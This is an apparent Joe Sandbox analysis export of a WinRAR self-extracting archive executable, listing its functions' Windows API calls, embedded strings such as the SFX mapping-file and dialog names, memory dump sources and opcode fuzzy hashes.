__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29094->29095 29096 cb1266 29095->29096 29096->28750 29096->28751 29097 cb37e5 GetClassNameW 30127 ca8da4 CompareStringW 29097->30127 29099->29094 29099->29097 29100 cb3809 GetWindowLongW 29099->29100 29101 cb386d GetWindow 29099->29101 29100->29101 29102 cb3819 SendMessageW 29100->29102 29101->29094 29101->29099 29102->29101 29103 cb382f GetObjectW 29102->29103 30128 caeae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29103->30128 29105 cb3846 30129 caeac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29105->30129 30130 caef21 13 API calls 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29105->30130 29108 cb3857 SendMessageW DeleteObject 29108->29101 29110 c91e0f 29109->29110 29111 c91e11 SetWindowTextW 29109->29111 29110->29111 29111->28779 29113 caf2f9 29112->29113 29114 caf31e 29112->29114 30133 ca8da4 CompareStringW 29113->30133 29117 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29114->29117 29116 caf30c 29116->29114 29118 caf310 FindWindowExW 29116->29118 29119 caf337 29117->29119 29118->29114 29120 cafdd1 29119->29120 29121 cafded 29120->29121 29122 c920b0 30 API calls 29121->29122 29123 cafe27 29122->29123 30134 c92dbb 29123->30134 29126 cafe4c 30141 c9278b 29126->30141 29127 cafe43 29128 c9232c 123 API calls 29127->29128 29131 cafe48 29128->29131 29133 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29131->29133 29132 c9232c 123 API calls 29132->29131 29134 cafe77 29133->29134 29134->28805 29134->28809 29135->28774 29136->28788 29138 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29137->29138 29139 cb57a0 29138->29139 29139->29139 29141 cb0678 5 API calls 29140->29141 29142 cb358d GetDlgItem 29141->29142 29143 cb35e4 SendMessageW SendMessageW 29142->29143 29144 cb35ac 29142->29144 29145 cb3643 SendMessageW 29143->29145 29146 cb3624 29143->29146 29147 cb35b7 ShowWindow SendMessageW SendMessageW 29144->29147 29148 cb365b 29145->29148 29149 cb365d SendMessageW SendMessageW 29145->29149 29146->29145 29147->29143 29148->29149 29150 cb367f SendMessageW 29149->29150 29151 cb36a2 SendMessageW 29149->29151 29150->29151 29152 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29151->29152 29153 cb36c0 29152->29153 29153->28808 29154->28800 29155->28826 29156->28828 29157->28912 29158->28944 29159->28951 29160->28957 29161->28961 29162->28966 29164 c92ea0 29163->29164 29165 c92e93 29163->29165 29164->28980 29166 c912a7 26 API calls 29165->29166 29166->29164 29167->28900 29168->28958 

Control-flow Graph

APIs
  • Part of subcall function 00CA6D7B: GetModuleHandleW.KERNEL32(kernel32,9CAA5719), ref: 00CA6DC7
  • Part of subcall function 00CA6D7B: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CA6DD9
  • Part of subcall function 00CA6D7B: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CA6E03
  • Part of subcall function 00CA1309: __EH_prolog3.LIBCMT ref: 00CA1310
  • Part of subcall function 00CA1309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00CA17FB,?,?,\\?\,9CAA5719,?,?,?,00000000,00CCA279,000000FF), ref: 00CA1319
  • Part of subcall function 00CAF4D4: OleInitialize.OLE32(00000000), ref: 00CAF4ED
  • Part of subcall function 00CAF4D4: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CAF524
  • Part of subcall function 00CAF4D4: SHGetMalloc.SHELL32(00CE532C), ref: 00CAF52E
• GetCommandLineW.KERNEL32 ref: 00CB4608
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 00CB464F
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 00CB4661
• UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 00CB466F
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 00CB467D
  • Part of subcall function 00CAFC38: __EH_prolog3.LIBCMT ref: 00CAFC3F
  • Part of subcall function 00CB3EFC: __EH_prolog3_GS.LIBCMT ref: 00CB3F03
  • Part of subcall function 00CB3EFC: SetEnvironmentVariableW.KERNEL32(sfxcmd,?,?,?,?,?,?,00000028), ref: 00CB3F1B
  • Part of subcall function 00CB3EFC: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00CB3F86
  • Part of subcall function 00CA51BF: _wcslen.LIBCMT ref: 00CA51E3
• UnmapViewOfFile.KERNEL32(00000000,00CE5430,00000400,00CE5430,00CE5430,00000400,00000000,00000001,?,00000000), ref: 00CB46CC
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 00CB46D3
• SetEnvironmentVariableW.KERNEL32(sfxname,00CD9698,00000000), ref: 00CB472F
• GetLocalTime.KERNEL32(?), ref: 00CB473A
• _swprintf.LIBCMT ref: 00CB4779
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CB478E
• GetModuleHandleW.KERNEL32(00000000), ref: 00CB4795
• LoadIconW.USER32(00000000,00000064), ref: 00CB47AC
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00020900,00000000), ref: 00CB4803
• Sleep.KERNELBASE(00001B58), ref: 00CB4834
• DeleteObject.GDI32 ref: 00CB4858
• DeleteObject.GDI32(01050E65), ref: 00CB4868
  • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                                • Part of subcall function 00CB19EE: __EH_prolog3_GS.LIBCMT ref: 00CB19F5
                                              • CloseHandle.KERNEL32 ref: 00CB48AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                              • API String ID: 3142445277-3710569615
                                              • Opcode ID: 2e94855de874eb68c61b9412d2ee5867965ac56e1e3d52fa38c43b7e98c065ba
                                              • Instruction ID: 28f0271023c8f8924eed1e96a6d1165d43daa9fc3bd8329d8710ba3ade6c5a50
                                              • Opcode Fuzzy Hash: 2e94855de874eb68c61b9412d2ee5867965ac56e1e3d52fa38c43b7e98c065ba
                                              • Instruction Fuzzy Hash: 0091F0B0508380AFC724EF61DC85FAFB7E8EB49708F40092DF949D61A2EB749904DB21

                                              Control-flow Graph (rendering not reproduced in this text export; the API calls it annotates are listed below.)
                                              APIs
                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CB0845,00000066), ref: 00CAEBE6
                                              • SizeofResource.KERNEL32(00000000,?,?,?,00CB0845,00000066), ref: 00CAEBFD
                                              • LoadResource.KERNEL32(00000000,?,?,?,00CB0845,00000066), ref: 00CAEC14
                                              • LockResource.KERNEL32(00000000,?,?,?,00CB0845,00000066), ref: 00CAEC23
                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CB0845,00000066), ref: 00CAEC3E
                                              • GlobalLock.KERNEL32(00000000), ref: 00CAEC4F
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CAEC73
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00CAECD7
                                                • Part of subcall function 00CAEB06: GdipAlloc.GDIPLUS(00000010), ref: 00CAEB0C
                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CAECB8
                                              • GlobalFree.KERNEL32(00000000), ref: 00CAECDE
                                              Strings
                                              Similarity
                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                              • String ID: PNG
                                              • API String ID: 211097158-364855578
                                              • Opcode ID: 049706e05b0f0c8184abdd76e6d6b7bb829d68746636908ef9932ca64c34e1f1
                                              • Instruction ID: 23789b2c2ad057581f65e3c8a2917e2e548b9dc7fe941238e3735e2cc0f60c87
                                              • Opcode Fuzzy Hash: 049706e05b0f0c8184abdd76e6d6b7bb829d68746636908ef9932ca64c34e1f1
                                              • Instruction Fuzzy Hash: 44316F71600312AFD710AF62DD88F2FBFACFF85768B140529F919D2261EB31D801DAA0
                                              APIs
                                                • Part of subcall function 00CA8781: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,9CAA5719,00000007,?,?,?,00CA8751,?,?,?,?,0000000C,00C94426), ref: 00CA879D
                                              • _wcslen.LIBCMT ref: 00CA395A
                                              • __fprintf_l.LIBCMT ref: 00CA3AA7
                                              Strings
                                              Similarity
                                              • API ID: ByteCharMultiWide__fprintf_l_wcslen
                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                              • API String ID: 1796436225-285229759
                                              • Opcode ID: 0f97daa0839d3b612974425d28c0000f2c6a27263ed6021e15dd9b885fb47af2
                                              • Instruction ID: a6a4fa30d87e6c5341db01a78c7d6750f20261836b51477e5e65ec20c678dad9
                                              • Opcode Fuzzy Hash: 0f97daa0839d3b612974425d28c0000f2c6a27263ed6021e15dd9b885fb47af2
                                              • Instruction Fuzzy Hash: CA52B67190029AABCF24DFA8CC95AEEB7B4FF05718F14052AF415E7281EB719B45CB50

                                              Control-flow Graph (rendering not reproduced in this text export; the API calls it annotates are listed below.)
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9F830
                                              • FindFirstFileW.KERNELBASE(?,?,00000274,00C9F733,000000FF,00000049,00000049,?,?,00C9A684,?,?,00000000,?,?,?), ref: 00C9F859
                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049), ref: 00C9F8A4
                                              • GetLastError.KERNEL32(?,?,?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049,?,00000000), ref: 00C9F902
                                              • FindNextFileW.KERNEL32(?,?,00000274,00C9F733,000000FF,00000049,00000049,?,?,00C9A684,?,?,00000000,?,?,?), ref: 00C9F92D
                                              • GetLastError.KERNEL32(?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049,?,00000000), ref: 00C9F93A
                                              Similarity
                                              • API ID: FileFind$ErrorFirstLast$H_prolog3_Next
                                              • String ID:
                                              • API String ID: 3831798110-0
                                              • Opcode ID: a220985be4a48d68c5be232cd12a50e091e939b8349053556bc40b46b71dcdab
                                              • Instruction ID: ac775dcaa282f71fd484260c6d5f98512697986178955a6527d9e4c1dd820ad8
                                              • Opcode Fuzzy Hash: a220985be4a48d68c5be232cd12a50e091e939b8349053556bc40b46b71dcdab
                                              • Instruction Fuzzy Hash: 40510D71904619EFCF54DF64C889AEDB7B4BB09324F1402AAE429E3290DB30AB95DF50
                                              APIs
                                              • _wcslen.LIBCMT ref: 00C9C342
                                                • Part of subcall function 00CA2095: __EH_prolog3_GS.LIBCMT ref: 00CA209C
                                                • Part of subcall function 00C957C0: __EH_prolog3.LIBCMT ref: 00C957C7
                                              Strings
                                              Similarity
                                              • API ID: H_prolog3H_prolog3__wcslen
                                              • String ID: __tmp_reference_source_
                                              • API String ID: 1523997010-685763994
                                              • Opcode ID: 1a16766b55931fce35c9364215f57f725e2b08411e434c2e76cb7be1b772f2e4
                                              • Instruction ID: b5597d045705ae7c27be3a769d8b4777b6143c7de497a54dc812f46da3360bde
                                              • Opcode Fuzzy Hash: 1a16766b55931fce35c9364215f57f725e2b08411e434c2e76cb7be1b772f2e4
                                              • Instruction Fuzzy Hash: 0AD209719046899FDF29DFB4C899BFEBBB4BF05304F04011EE4AAA7241DB34AA45DB50
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000000,?,00CBEC80,00000000,00CD6F40,0000000C,00CBEDD7,00000000,00000002,00000000), ref: 00CBECCB
                                              • TerminateProcess.KERNEL32(00000000,?,00CBEC80,00000000,00CD6F40,0000000C,00CBEDD7,00000000,00000002,00000000), ref: 00CBECD2
                                              • ExitProcess.KERNEL32 ref: 00CBECE4
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 5288e25f62bc4dbb187da3bda56ed9634bf21688de91bd17d470ee7542fc38e1
                                              • Instruction ID: fc4befa3f42bbab035f89cf157a045810175e0486744d48c0460410387069501
                                              • Opcode Fuzzy Hash: 5288e25f62bc4dbb187da3bda56ed9634bf21688de91bd17d470ee7542fc38e1
                                              • Instruction Fuzzy Hash: BFE0B632000618AFCF126F65DE49F9C3F69EF51781F044464FD599A522CB36ED42EB40
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: 795a252bc31a7d9a3f13ac77851b1932b4717dd39b479a8bc92464d7a2eb5d7c
                                              • Instruction ID: 21e44bf82a0bcb7d42004ebfb21600e7ec6a65d5eac08b47fadc90840520d51e
                                              • Opcode Fuzzy Hash: 795a252bc31a7d9a3f13ac77851b1932b4717dd39b479a8bc92464d7a2eb5d7c
                                              • Instruction Fuzzy Hash: C5E1A3715043468FDB24CF28C984B9BBBE1BF8A308F04456DE8999B342D774EE45CB52
                                              APIs
                                              • __EH_prolog3_catch_GS.LIBCMT ref: 00CB090A
                                                • Part of subcall function 00C91E44: GetDlgItem.USER32(00000000,00003021), ref: 00C91E88
                                                • Part of subcall function 00C91E44: SetWindowTextW.USER32(00000000,00CCC6C8), ref: 00C91E9E
                                              • EndDialog.USER32(?,00000000), ref: 00CB0A18
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CB0A57
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CB0A71
                                              • IsDialogMessageW.USER32(?,?), ref: 00CB0A84
                                              • TranslateMessage.USER32(?), ref: 00CB0A92
                                              • DispatchMessageW.USER32(?), ref: 00CB0A9C
                                              • EndDialog.USER32(?,00000001), ref: 00CB0ADE
                                              • GetDlgItem.USER32(?,00000068), ref: 00CB0B04
                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CB0B1F
                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CCC6C8), ref: 00CB0B32
                                              • SetFocus.USER32(00000000), ref: 00CB0B39
                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CB0C20
                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CB0C4C
                                              • GetTickCount.KERNEL32 ref: 00CB0C79
                                              • GetLastError.KERNEL32(?,00000011), ref: 00CB0CD5
                                              • GetCommandLineW.KERNEL32 ref: 00CB0DF9
                                              • _wcslen.LIBCMT ref: 00CB0E06
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,00CE5430,00000400,00000001,00000001), ref: 00CB0E85
                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00CB0EA3
                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00CB0EDC
                                              • WaitForInputIdle.USER32(?,00002710), ref: 00CB0F0B
                                              • Sleep.KERNEL32(00000064), ref: 00CB0F25
                                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,00CE5430,00000400), ref: 00CB0F61
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00CE5430,00000400), ref: 00CB0F6D
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CB1072
                                                • Part of subcall function 00C91E1F: GetDlgItem.USER32(?,?), ref: 00C91E34
                                                • Part of subcall function 00C91E1F: ShowWindow.USER32(00000000), ref: 00C91E3B
                                              • SetDlgItemTextW.USER32(?,00000065,00CCC6C8), ref: 00CB108A
                                              • GetDlgItem.USER32(?,00000065), ref: 00CB1093
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00CB10A2
                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_000206D0,00000000,?), ref: 00CB1422
                                              • EndDialog.USER32(?,00000001), ref: 00CB1436
                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CB10B1
                                                • Part of subcall function 00CAE265: __EH_prolog3_GS.LIBCMT ref: 00CAE26C
                                                • Part of subcall function 00CAE265: ShowWindow.USER32(?,00000000,00000038), ref: 00CAE294
                                                • Part of subcall function 00CAE265: GetWindowRect.USER32(?,?), ref: 00CAE2D8
                                                • Part of subcall function 00CAE265: ShowWindow.USER32(?,00000005,?,00000000), ref: 00CAE373
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CB114F
                                              • SendMessageW.USER32(?,00000080,00000001,00040449), ref: 00CB1284
                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,01050E65), ref: 00CB129D
                                              • GetDlgItem.USER32(?,00000068), ref: 00CB12A6
                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CB12BE
                                              • GetDlgItem.USER32(?,00000066), ref: 00CB12E6
                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CB135D
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CB1371
                                              • EnableWindow.USER32(?,00000000), ref: 00CB15A7
                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CB15E8
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CB160D
                                                • Part of subcall function 00CB1D4F: __EH_prolog3_GS.LIBCMT ref: 00CB1D59
                                              Strings
                                              Similarity
                                              • API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
                                              • String ID: -el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp
                                              • API String ID: 3616063595-3000381960
                                              • Opcode ID: 7efc238786d93cb285ffaeaa4d599bba486e250a0971622a592e3474957104ef
                                              • Instruction ID: 9a22f858a93d35facd9cb92d24ff1f0c9601d3c07a3d622f92ecab140e501e1e
                                              • Opcode Fuzzy Hash: 7efc238786d93cb285ffaeaa4d599bba486e250a0971622a592e3474957104ef
                                              • Instruction Fuzzy Hash: 9B72C570940388AEEF21EBA4DC89FEE7BB8AB01304F544159F505BB1E2DBB45E45DB21

                                              Control-flow Graph (rendering not reproduced in this text export; the API calls it annotates are listed below.)
                                              APIs
                                              • GetModuleHandleW.KERNEL32(kernel32,9CAA5719), ref: 00CA6DC7
                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CA6DD9
                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CA6E03
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA70CA
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CA70DF
                                              • ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 00CA70FF
                                              • CloseHandle.KERNEL32(00000000), ref: 00CA7187
                                              • CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 00CA71F8
                                              • AllocConsole.KERNEL32 ref: 00CA735E
                                              • GetCurrentProcessId.KERNEL32 ref: 00CA7368
                                              • AttachConsole.KERNEL32(00000000), ref: 00CA736F
                                              • GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 00CA738F
                                              • WriteConsoleW.KERNEL32(00000000), ref: 00CA7396
                                              • Sleep.KERNEL32(00002710), ref: 00CA73A1
                                              • FreeConsole.KERNEL32 ref: 00CA73A7
                                              • ExitProcess.KERNEL32 ref: 00CA73B7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                              • API String ID: 2644799563-3298887752
                                              • Opcode ID: d3899fa8a68d003ce9ec7adc7b3f0bcf93a7dec0773026d1a3df1520336a3860
                                              • Instruction ID: ffb84a45eef418dbfd463efc56063bf2c89c2e98c5299e8b9a11a3734b779bef
                                              • Opcode Fuzzy Hash: d3899fa8a68d003ce9ec7adc7b3f0bcf93a7dec0773026d1a3df1520336a3860
                                              • Instruction Fuzzy Hash: DAF183B1400289DBCF24DFA4CC89FDE7BA9BF06308F54422DF91A9B191DB709A49DB51

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00CB0678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CB0689
                                                • Part of subcall function 00CB0678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CB069A
                                                • Part of subcall function 00CB0678: IsDialogMessageW.USER32(00010464,?), ref: 00CB06AE
                                                • Part of subcall function 00CB0678: TranslateMessage.USER32(?), ref: 00CB06BC
                                                • Part of subcall function 00CB0678: DispatchMessageW.USER32(?), ref: 00CB06C6
                                              • GetDlgItem.USER32(00000068,00000000), ref: 00CB3595
                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,00CAFD20,00000001,?,?), ref: 00CB35BA
                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CB35C9
                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CCC6C8), ref: 00CB35D7
                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CB35F1
                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CB360B
                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CB364F
                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CB3662
                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CB3675
                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CB369C
                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CCC860), ref: 00CB36AB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                              • String ID: \
                                              • API String ID: 3569833718-2967466578
                                              • Opcode ID: acaa096e2ef0cd9a84f5644026291abbcae37717fbeff0f0b3b9c7016ebd6792
                                              • Instruction ID: 80b71340ea5d8e1952d56186a3fce32fa69217a0603b4536f5680cc885092c7d
                                              • Opcode Fuzzy Hash: acaa096e2ef0cd9a84f5644026291abbcae37717fbeff0f0b3b9c7016ebd6792
                                              • Instruction Fuzzy Hash: 9231D071249780BFE3109F20DC89FAF7BECEF46705F000619F9559A2E0DB649A058BA6

                                              Control-flow Graph

                                              [Control-flow graph of the function at 00CB38A0: basic-block and edge listing omitted; the API calls it contains are listed below]
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CB38A7
                                              • ShellExecuteExW.SHELL32(?), ref: 00CB3AA4
                                              • IsWindowVisible.USER32(?), ref: 00CB3ACF
                                              • ShowWindow.USER32(?,00000000), ref: 00CB3ADD
                                              • WaitForInputIdle.USER32(?,000007D0), ref: 00CB3AED
                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00CB3B0F
                                              • CloseHandle.KERNEL32(?), ref: 00CB3B33
                                              • ShowWindow.USER32(?,00000001), ref: 00CB3B76
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
                                              • String ID: .exe$.inf
                                              • API String ID: 3208621885-3750412487
                                              • Opcode ID: 0c58b8ffa6dad72e17fcd6561b7784fa01b7315e772ec9d19bb53dc78d1afa9a
                                              • Instruction ID: beb6536935a0277372a8fa3921121bf74da6ca369c1128bdba0e07d7f3cd9f7a
                                              • Opcode Fuzzy Hash: 0c58b8ffa6dad72e17fcd6561b7784fa01b7315e772ec9d19bb53dc78d1afa9a
                                              • Instruction Fuzzy Hash: 84B1AD31E00298DFCF21DFA4C989BEDB7B5AF44310F288119E854AB295DB74AF46DB50

                                              Control-flow Graph

                                              [Control-flow graph of the function at 00CAF2CE: basic-block and edge listing omitted; the API calls it contains are listed below]
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000050), ref: 00CAF2EF
                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CAF326
                                                • Part of subcall function 00CA8DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00CA0E3F,?,?,?,00000046,00CA1ECE,00000046,?,exe,00000046), ref: 00CA8DBA
                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CAF316
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                              • String ID: @Ut$EDIT
                                              • API String ID: 4243998846-2065656831
                                              • Opcode ID: be2a505704b3d53406911378375727f4731e06c0a8408a385bc7f42fea905bcd
                                              • Instruction ID: 8c587388f7a8360227b81feab4b8a53e8e18db69ebef5dc7ff4a8135aee556d5
                                              • Opcode Fuzzy Hash: be2a505704b3d53406911378375727f4731e06c0a8408a385bc7f42fea905bcd
                                              • Instruction Fuzzy Hash: 77F0C871701219ABDF20AB64DD45FDFB7ACDF46B04F010069B901FB190DA70AA058669

                                              Control-flow Graph

                                              [Control-flow graph of the function at 00C9E180: basic-block and edge listing omitted; the API calls it contains are listed below]
                                              APIs
